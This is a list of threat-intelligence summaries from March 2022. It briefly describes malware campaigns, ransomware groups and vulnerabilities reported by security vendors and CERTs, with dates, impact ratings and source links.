- Summary:
- Trelix researchers discovered a first stage malicious campaign targeting luxury hotels in Macao China since last 5 months and the attack has been attributed to South Korean APT group DarkHotel.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware disguised as a Windows Help File
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- ASEC Team has discovered a malware disguised as Windows Help File (*.chm) and targeting Korean users. The CHM File is complied HTML Help file which is executed via Microsoft HTML help executable program. After executing CHM File it downloads additional malicious files.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Serpent Backdoor Targets French government firms
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- ProofPoint researchers identified a targeted attack leveraging an open-source package installer Chocolatey to deliver a backdoor. The backdoor was dubbed as Serpent and target has been French firms in cinstruction and real estate.
—
- Intel Source:
- Mandiant
- Intel Name:
- CAKETAP Rootkit deployed by UNC2891
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Security researchers from Mandiant came across a new Unix rootkit called CakeTap that was used to steal ATM banking data. This rootkit was leveraged by UNC2891.
—
- Intel Source:
- STR
- Intel Name:
- EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Trend Micro
- Intel Name:
- Cyclops Blink malware targets Asus Router
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- Researchers from TrendMicro have analyzed technical capabilities of the Cyclops Blink malware variant that has been targeting ASUS routers and provides an extensive list of more than 150 current and historical Command and Control (C2) servers of the Cyclops Blink botnet.
Source:
https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers–.html
—
- Intel Source:
- Intel Name:
- Conti Gang working with IAB
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Google TAG team has discovered an operations of a threat actor dubbed ‘EXOTIC LILY ‘ an initial access broker linked to the Conti and Diavol ransomware operations. EXOTIC LILY was first spotted exploiting a zero-day vulnerability in Microsoft MSHTML (CVE-2021-40444). After further investigation it is determined that EXOTIC LILLY is an initial access broker that uses large-scale phishing campaigns to breach targeted corporate networks.
Source:
https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- BlackCat and BlackMatter ransomware connection
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers analysed relation between BlackCat ransomware and BlackMatter ransomware. Researchers has concluded with moderate confidence that the same affiliate are behind both the ransomware operators as same C2 Infrastructure used for certain attacks.
Source:
https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html
—
- Intel Source:
- Avast
- Intel Name:
- DirtyMoe malware
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers from Avast warned of the rapid growth of the DirtyMoe botnet which passed from 10 000 infected systems in 2020 to more than 100 000 in the first half of 2021. Experts defined DirtyMoe as a complex malware that has been designed as a modular system. The Windows botnet has been active since late 2017 it was mainly used to mine cryptocurrency but it was also involved in DDoS attacks in 2018.
Source:
https://decoded.avast.io/martinchlumecky/dirtymoe-5/
—
- Intel Source:
- Blackberry
- Intel Name:
- LokiLocker RaaS Targets Windows Systems
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- A new ransomware as a service has been identified by BlackBerry researchers dubbed as LokiLocker. It targets English-speaking victims and Windows. The threat was first seen in the wild in mid-August 2021. LokiLocker encrypts victim’s files on local drives and network shares with a standard combination of AES for file encryption and RSA for key protection.
Source:
https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware
—
- Intel Source:
- Palo Alto
- Intel Name:
- Cobalt Strike-an effective emulator
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Cobalt Strike is a tool that emulates command and control communications and is widely used in real-world attacks but can also be used as a way to evade traditional firewall defenses. Cobalt Strike users control Beacon’s HTTP indicators through a profile and can select either the default profile or a customizable Malleable C2 profile.
Source:
https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
—
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- GhostWriter New Espionage Campaign Update
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious zip file which contains the Microsoft Compiled HTML Help file named dovidka.chm. The malicious file was designed to spread malware for espionage purposes against targets located in Ukraine that displays the logos of the Ukrainian President’s office and secret services with content relating to advice on dealing with the bombing.
—
- Intel Source:
- Dragos
- Intel Name:
- CONTI & EMOTET Infrastructure
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers at Dragos has observed consistent network communication between the Emotet ransomware group and automotive manufacturers across North America and Japan which is suspected to be controlled by the Conti ransomware.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot infection with Cobalt Strike and VNC
- Date of Scan:
- 2022-03-18
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS has disected
Source:
https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/
—
- Intel Source:
- Prevailion
- Intel Name:
- WIZARD SPIDER massive phishing campaign
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Prevailion earlier this year has identified a massive phishing campaign focused on collecting credentials of Naver users. Naver is a popular South Korean online platform comparable to Google that offers a variety of services (e.g. email news and search among many others). Researchers found overlaps with infrastructure which is historically linked with WIZARD SPIDER a Russian-based threat actor motivated towards initial access and ransomware operations.
Source:
https://www.prevailion.com/what-wicked-webs-we-unweave/
—
- Intel Source:
- ASEC
- Intel Name:
- Gh0stCringe RAT targets MS-SQL and MySQL servers
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- ASEC team has analysed and monitored a malware which being distrbuted to vulnerable MySQL and MSSQL servers. ASEC Team named the malware as Gh0stCringe also known as CirenegRAT.
—
- Intel Source:
- netlab360
- Intel Name:
- B1txor20 Botnet exploits Log4j vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Qihoo 360’s Netlab has captured an ELF file on their honeypot system which was first observed propagating through the Log4j vulnerability on February 9 2022. After closely analysing the file they named it B1txor20 based on the propogation using the file name ‘b1t ‘ the XOR encryption algorithm and the RC4 algorithm key length of 20 bytes.
Source:
https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_en/
—
- Intel Source:
- Securonix
- Intel Name:
- EnemyBot – Linux based Botnet
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- Securonix Threat Labs has identified a Linux based botnet dubbed as EnemyBot. STL correlates EnemyBot to LolFMe botnet which contains similar strings such as “watudoinglookingatdis”. The EnemyBot malware also have ability to steal data via HTTP POST which STL identified in their analysis the malware was sending the data back to the original IP address.
Source:
https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/
—
- Intel Source:
- CISA
- Intel Name:
- Russian Threat Actors exploits PrintNightMare Vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- In an Joint Advisory by FBI & CISA they are warning organizations that Russian state-sponsored threat actors have gained network access through exploitation of default MFA protocols and a known vulnerability. This advisory also provides TTPs IOCs and recommendations to protect against Russian state-sponsored malicious cyber activity.
—
- Intel Source:
- STR
- Intel Name:
- CaddyWiper TTP_Seeder_Queries_15/03/222
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- ESET
- Intel Name:
- CaddyWiper Malware
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- ESET Researcher has idenfied third Wiper malware impacting Ukraine dubbed as CaddyWiper. This wiper is relatively smaller compiled size of just 9KB than previous wiper attacks. This is a developing threat currently only one hash is available.
—
- Intel Source:
- Cyble
- Intel Name:
- Pandora Ransomware
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
- Cyble Research Labs has analysed a sample of Pandora ransomware. After analysing the sampled Cyble believe that Pandora ransomware is a re-brand of ROOK ransomware as they observed similar behaviour in the past. Pandora ransomware gang is suspected of leveraging the double extortion method.
Source:
https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/
—
- Intel Source:
- CERT-UA
- Intel Name:
- GrimPlant and GraphSteel used to attack Ukraine
- Date of Scan:
- 2022-03-15
- Impact:
- MEDIUM
- Summary:
- CERT-UA identified cyberattacks being launched by the UAC-0056 threat group targeting state authorities of Ukraine using phishing emails with instructions on improving information security that would deliver an executable leading to a Cobalt Strike beacon.
—
- Intel Source:
- SecureList
- Intel Name:
- Dirty Pipe vulnerability in Linux kernel
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- Security researcher Max Kellermann discovered a high severity vulnerability in the Linux kernel which can be used for local privilege escalation. It affects the Linux kernels from 5.8 through any version before 5.16.11 5.15.25 and 5.10.102 and can be used for local privilege escalation.
Source:
https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/
—
- Intel Source:
- STR
- Intel Name:
- North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Security Soup
- Intel Name:
- Decoding Dannabot malware
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- A researcher on security soup wrote about VBS based DanaBot downloader which have added pbfuscation scheme and few other TTPs to its arsenal.
Source:
https://security-soup.net/decoding-a-danabot-downloader/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- NIGHT SPIDER Zloader Campaign
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrike tracked an ongoing widespread intrusion campaign leveraging bundled .msi installers to trick victims into downloading malicious payloads alongside legitimate software. This was used to execute NIGHT SPIDER’s Zloader trojan.
Source:
https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers analysed the malware/tool called ‘Liberator’ by disBalancer group. Furthermore the post has been updated with two new IoCs.
Source:
https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.htmll
—
- Intel Source:
- Security Joes
- Intel Name:
- Sockbot in GoLand
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Security Joes incident response team responded to malicious activity in one of their clients’ network infrastructure. During the investigation it was discovered that the threat actors used two customized GoLang-compiled Windows executables “lsassDumper” and “Sockbot” to perform the attack.
Source:
https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Remcos RAT distribution campaign take advantage of Ukraine Invasion
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cisco Talos Reserachers has observed that Threat Actors are using Email lures themes related to Russia-Ukraine conflict fundraising and humanitrain support. These emails are related to scam activity and delivering Remcos RAT.
Source:
https://blog.talosintelligence.com/2022/03/ukraine-invasion-scams-malware.html
—
- Intel Source:
- Blackberry
- Intel Name:
- CryptBot Infostealer disguised as Cracked Software
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry cam across a new and improved version of the malicious infostealer CryptBot which have been released via compromised pirated sites which appear to offer “cracked” versions of popular software and video games.
Source:
https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer
—
- Intel Source:
- Netskope
- Intel Name:
- Formbook/XLoader targets Ukraine Government Officials
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Netskope Threat Labs has analysed a phishing email targeting high-rank government officials in Ukraine. The email seems to be part of new spam campaign which contians infected spreadsheet. The email also contians a .NET executable responsible for loading Formbook malware in a multi-stage chain.
—
- Intel Source:
- seguranca-informatica
- Intel Name:
- Brazilian trojan targets Portuguese users
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- A new variant of Brazilian trojan have targeted users from Portugal and there seems to be no difference in terms of sophistication in contrast to other well-known trojans such as Maxtrilha URSA and Javali.The trojan has been disseminated via phishing templates impersonating Tax services in Portugal.
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer Distributed via YouTube
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- ASEC researchers has discovered an Infostealer being distributed voa YouTube. The threat actor disguised the malware as a game hack and uploaded the video on YouTube with dowload link of the malware.
—
- Intel Source:
- Cylera
- Intel Name:
- Kwampirs Malware Linked to Shamoon APT
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cylera Labs assess with medium to high confidence that Shamoon and Kwapirs are the same group or close collaborators sharing updates techniques and code over the course of multiple years. Evolution of Kwampris and its connections with Shamoon 1 and 2 are also well documented in the recent report by Cylera.
—
- Intel Source:
- esentire
- Intel Name:
- TunnelVision exploits VMWare Horizon Servers
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from esentire found suspicious account creation and credential harvesting attempts on a customer’s endpoint and it was tracked to VMware Horizon server. The attack with high confidence was linked to TunnelVision Iranian-aligned threat actor.
Source:
https://www.esentire.com/blog/exploitation-of-vmware-horizon-servers-by-tunnelvision-threat-actor
—
- Intel Source:
- NovaSOC
- Intel Name:
- Russian Threat Actors using Google Ad Delivery Network
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Novasoc caught Russian Actors Utilizing Google Ad Delivery Network to Establish Browser Connections. Russian IP addresses has been using the Google ad delivery network as a mechanism to initiate client network connections.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook malware targets Ukrainians
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- MalwareBytes researchers discovered recently discovered about a malicious spam campaign dropping the Formbook stealer specifically targeting Ukrainians. The email lure which are being sent is written in Ukrainian.
—
- Intel Source:
- Lab52
- Intel Name:
- LazyScripter APT H-Worm campaign
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Lab52 has tracked the activity of LazyScripter APT and discovered a new malware and new elements of infrastructure under LazyScripter arsenal. Further analysing the LazyScripter malware they found the usage of popular and open source online obfuscating tool for scripts which would inject their own downloader for njRAT.
—
- Intel Source:
- Sophos
- Intel Name:
- Email interjection by Qakbot
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Sophos Labs have discovered Qakbot botnet’s new technique where the botnet spread itself around by inserting malicious replies into the middle of existing email conversations. These email interruption is in the form of reply-all message include a short sentence and a link to download a zip file containing a malicious office document.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater subgroup leveraging maldocs and RATs
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cisco Talos believe with high confidence that there are sub-groups operating under MuddyWater umberalla targeting Turkey and Arabian peninsula countries with maldocs and Windows script file based RAT. These subgroups are highly motivated to conduct espionage intellectual property theft implant malware and ransomware in targeted network.
Source:
https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Threat Actors are attempting to exploit Ukrainian sympathizers by offering malware as cyber tools to target Russian entities. Cisco Talos analysed one such instance where a threat actor offering DDoS tool on Telegram to target Russian websites. They downloaded the file and found it to be a infostealer malware.
Source:
https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html
—
- Intel Source:
- Abnormal
- Intel Name:
- Online Contact forms delivering BazarLoader
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cybercriminals are always looking for new ways to targets users Researchers at Abnormal Security has identified attacks targeting users through an online contact form. They also observed that these attacks leads to deliverying BazarLoader malware.
Source:
https://abnormalsecurity.com/blog/bazarloader-contact-form
—
- Intel Source:
- FBI FLASH
- Intel Name:
- Conti Ransomware Indicator of Compromise
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- A join advisory has been released by FBI NSA and CISA detailing about the updated indicators of compromise of Conti ransomware and their TTPS. The ransomware have been very active and have included attack vectors like TrickBot and CobaltStrike.
—
- Intel Source:
- Avast
- Intel Name:
- Prometheus Ransomware Decrypted
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Avast researchers have recently released decryptor for the Prometheus Ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.
Source:
https://decoded.avast.io/threatresearch/decrypted-prometheus-ransomware/
—
- Intel Source:
- Lumen
- Intel Name:
- Emotet Resurgence
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- The infamous malware ‘Emotet’ returned on November 2021 after a 10 month gap is once again showing signs of steady growth. Researchers at Lumen Black Lotus Labs have determined a strong resurgence of Emotet with 130 000 unique bots spread across 179 countries since its return.
—
- Intel Source:
- Avast
- Intel Name:
- Racoon Stealer leverages Telegram
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Researchers from Avast recently noted Raccoon Stealer which is a password stealing malware using the Telegram infrastructure to store and update actual C&C addresses. Raccoon Stealer is getting distributed via downloaders: Buer Loader and GCleaner.
Source:
https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/
—
- Intel Source:
- STR
- Intel Name:
- APT41_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Mandiant
- Intel Name:
- APT41 targeting US Government
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- Researchers at Mandiant claiming that they became aware of a campaign in May 2021 when they were called in to investigate an attack on US government network. An analysis revealed that the attack had likely carried out by Chinese nation state group APT41. Researchers has confirmed that the hackers have compromised the networks of at least six U.S. state government organizations between May 2021 and February 2022.
Source:
https://www.mandiant.com/resources/apt41-us-state-governments
—
- Intel Source:
- Fortinet
- Intel Name:
- Agent Tesla RAT campiagn
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- FortiGaurd Labs analysed a phishing email impersonate as Ukraine based materials and chemical manufacturing company sharing purchase order. The phishing email has PPT as attachment that is multi-stage efforts to deploy the Agent Telsa RAT.
Source:
https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla
—
- Intel Source:
- Trend Micro
- Intel Name:
- Nokoyawa Ransomware linked to Hive
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers came across a new ransomware which had similarities with Hive ransomware like their attack chain teh tools used to the order in which they execute various steps. Most of targets of the ransomware are located in South America.
Source:
https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter New Espionage Campaign
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious zip file which contains the Microsoft Compiled HTML Help file named dovidka.chm. The malicious file was designed to spread malware for espionage purposes against targets located in Ukraine that displays the logos of the Ukrainian President’s office and secret services with content relating to advice on dealing with the bombing.
—
- Intel Source:
- Trend Micro
- Intel Name:
- RURansom Wiper Targets Russia
- Date of Scan:
- 2022-03-09
- Impact:
- LOW
- Summary:
- Recently TrendMicro researchers analyzed sample released by MalwareHnterTeam which as per them is a wiper but decoyed like a ransomware and it was targeting Russia. The malware is written in .NET programming language and spreads as a worm.
Source:
https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html
—
- Intel Source:
- STR
- Intel Name:
- UNC1151_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Intel Name:
- Threat Landscape around Ukraine
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- The Google Threat Analysis Group (TAG) has observed phishing campaigns and espionage activity from a range of threat actors including FancyBear (APT28) and Ghostwriter targeting Ukraine. Activities from Mustang Panda was also noted.
Source:
https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/
—
- Intel Source:
- CrowdStrike
- Intel Name:
- PROPHET SPIDER Exploits Citrix ShareFile
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- CrowdStrike Inteligence team has investigated an incident where PROPHET SPIDER targeting Microsoft IIS by exploiting CVE-2021-22941. PROPHET SPIDER first spotted on May 2017 that intially access to the targeted networks by compromising vulnerable web servers.
Source:
https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/
—
- Intel Source:
- Fortinet
- Intel Name:
- Emotet recent campaign using MS Excel
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Fortinet researchers has conducted a deep research on 500 Excel files which were involved in delivering Emotet Trojan. Researchers analysed the Excel file leveraged to spread Emotet anti-analysis techniques used persistence on victim’s deivce communicates with C2 servers and how modules are delivered loaded and executed on target system.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA416 targets European Government
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Researchers at Proofpoint has discovered a Threat group TA416 targeting European diplomatic entities including an individuals involve in refguee and migrant services. TA416 group has assessed to be aligned with Chinese nation state which exploits web vulnerabilities to profile their targets. Researchers identified the campaign is escalated since the tension between Russia Ukraine and NATO members in Europe.
—
- Intel Source:
- ASEC
- Intel Name:
- Webhards distributing njRAT
- Date of Scan:
- 2022-03-08
- Impact:
- LOW
- Summary:
- ASEC researchers has identified njRAT malware is being distributed through webhard. Webhard is a platform used to distribute malware and it is mainly used by attackers to target Korean users. The malware disguised as an adult game that was uploaded in webhard.
—
- Intel Source:
- FBI FLASH
- Intel Name:
- RagnarLocker Ransomware IoCs
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- Federal Bureau of Investigation (FBI) published a new FLASH report that provides additional IOCs associated with RagnarLocker ransomware. The FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware.
—
- Intel Source:
- Curated Intel
- Intel Name:
- Global credential harvesting campaign
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Curated Intelligence recently tracked a new global credential harvesting campaign targeting Microsoft accounts through a range of phishing emails masquerading as ‘shared document’ notifications which deliver an embedded URL that leads to a fake Adobe Document Cloud application login page.
Source:
https://www.curatedintel.org/2022/03/curated-intel-threat-report-adobe.html
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook targets Oil & Gas companies
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- During our random intel gathering we identified a tweet from Malwarebytes Threat Intelligence which states that FormBook continues to target Oil and Gas Companies. It also has potential IoCs. Few hours later Malwarebytes has published a blog with the findings. The campaign was delivered by a targeted email that contained two attachments one is a pdf file and the other an Excel document.
—
- Intel Source:
- Qualys
- Intel Name:
- AvosLocker group new variant targets Linux systems
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- AvosLocker ransomware group made its first presence in June 2021 targeting Windows machine. Recently researchers at Qualys has identified that the AvosLocker group is also targeting Linux environments. The AvosLocker ransomware group advertises their latest ransomware variants on the Darkweb Leak site and mentioned that tthey have added support for encrypting Linux systems specifically targeting VMware ESXi virtual machines.
—
- Intel Source:
- Telsy
- Intel Name:
- Cyber campaign against Indian Government
- Date of Scan:
- 2022-03-07
- Impact:
- LOW
- Summary:
- Researchers from Telsy identified a spear phishing campaign targetting Indian government. The threat actors are using legitimate portal as C2 and encrypted HTTPS communication. Legitimate sites were used as cobalt strike C&C.
Source:
https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Multi malware campaign on Ukraine
- Date of Scan:
- 2022-03-04
- Impact:
- HIGH
- Summary:
- Trend Micro Research have verified and validated a number of alleged cyber attacks carry out by multiple groups in support of both the countries Russia Ukraine. Researchers have analysed internal data and external reports to provide these information.
—
- Intel Source:
- Zscaler
- Intel Name:
- DanaBot attacks Ukrainian MOD
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- On 2 Mar 2022 in the midst of Russia Ukraine conflict Zscaler identified a threat actor launched an HTTP-based DDoS attack against the Ukrainian Ministry of Defense’s webmail server. The threat attack is using DanaBot to launch DDoS attack and deliver second-stage malware payload using the download and execute command.
—
- Intel Source:
- Cofense
- Intel Name:
- Russia-Ukraine Conflict Leverages Phishing Themes
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- As Russia Ukraine conflict on the ground and cyber front going hand in hand. Cofense Phishing Defense Center monitoring phishing emails related to the conflict and has identifed malicious campaign that are using conflict as a lure to target users and enterprises. However Cofense do not have any evidence to support the phishing campaign attribution towards the countries directly involved in war.
Source:
https://cofense.com/blog/russia-ukraine-conflict-leverages-phishing-themes
—
- Intel Source:
- SecureWorks
- Intel Name:
- Domains Linked to Phishing Attacks Targeting Ukraine
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureWorks CTU has investigated a warning published by CERT-UA on 25th Feb 2022 regarding the phishing attacks targeting Ukrainian military personnel and government. Researchers attributed this campaign to MOONSCAPE threat group whereas CERT-UA attributed to UNC1151 APT group linked to Belarusian government.
Source:
https://www.secureworks.com/blog/domains-linked-to-phishing-attacks-targeting-ukraine
—
- Intel Source:
- AT&T
- Intel Name:
- BlackCat Ransomware- Technical Analysis
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- AT&T researchers recently analyzed BlackCat ransomware samples which was quite active in Jan 2022. The keytakaways from their analysis was that the ransomware is coded in Rust and targets multiple platform WINDOWS AND LINUX.
Source:
https://cybersecurity.att.com/blogs/labs-research/blackcat-ransomware
—
- Intel Source:
- Fortinet
- Intel Name:
- SoulSearcher Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have analyzed the evolution of SoulSearcher Malware which have been targting Windows and collecting ssensitive information and executes additional malicious modules.
Source:
https://www.fortinet.com/blog/threat-research/unraveling-the-evolution-of-the-soul-searcher-malware
—
- Intel Source:
- Security Intelligence
- Intel Name:
- TrickBot upgrades AnchorDNS Backdoor
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from IBM discovered a updated version of Trickbot Group’s AnchorDNS backdoor being used in recent attacks ending with the deployment of Conti ransomware. AnchorDNS is notable for communicating with its Command and Control (C2) server using the DNS protocol.
Source:
https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/
—
- Intel Source:
- ASEC
- Intel Name:
- Vollgar CoinMiner targets MSSQL
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC is monitoring a specific form of CoinMiner that has been consistently distributed to vulnerable MS-SQL servers. ASEC Infrastructure has detected Vollgar CoinMiner samples in the logs. Vollgar is a typical CoinMiner that is installed via brute force attacks against MS-SQL servers with vulnerable account credentials.
—
- Intel Source:
- Sophos
- Intel Name:
- Conti and Karma attacked Healthcare
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Sophos Labs researchers identified that two ransomware groups Conti & Karma have exploited ProxyShell vulnerabilty to gain access to the network of healthcare provider in Canada with very different tactics. Karma group exfiltrated data but did not encrypt the targeted systems. While Conti came into the network later but but encrypted the targeted systems.
—
- Intel Source:
- STR
- Intel Name:
- Conti Leaks_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Huntress
- Intel Name:
- BABYSHARK Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Huntress has identified a APT group activity which was attributed to North Korean threat actors targeting national security institutes. The North Korean APT using a malware family called BABYSHARK this variant of malware customized to specific victim environment.
Source:
https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood
—
- Intel Source:
- Barracuda
- Intel Name:
- DDoS botnets cryptominers exploits Log4shell
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Barracuda researchers have analyzed botnet and cryptobots exploiting Log4shell vulnerabilities and it has been constant since two months. They noticed that major of attacks came from IP addresses in the U.S. with half of those IP addresses being associated with AWS Azure and other data centers.
Source:
https://blog.barracuda.com/2022/03/02/threat-spotlight-attacks-on-log4shell-vulnerabilities/
—
- Intel Source:
- Cyble
- Intel Name:
- Emotet Malware Updated TTPs
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Cyble researchers came across email phishing campaigns by Emotet malware and these were similar to old ones which used spam emails with malicious MS Excel files as the initial attack vector to infect targets. It was also observed that Emotet is rebuilding its botnet with the help of the TrickBot malware.
Source:
https://blog.cyble.com/2022/02/26/emotet-malware-back-in-action/
—
- Intel Source:
- Symantec
- Intel Name:
- Daxin Backdoor espionage campaign
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
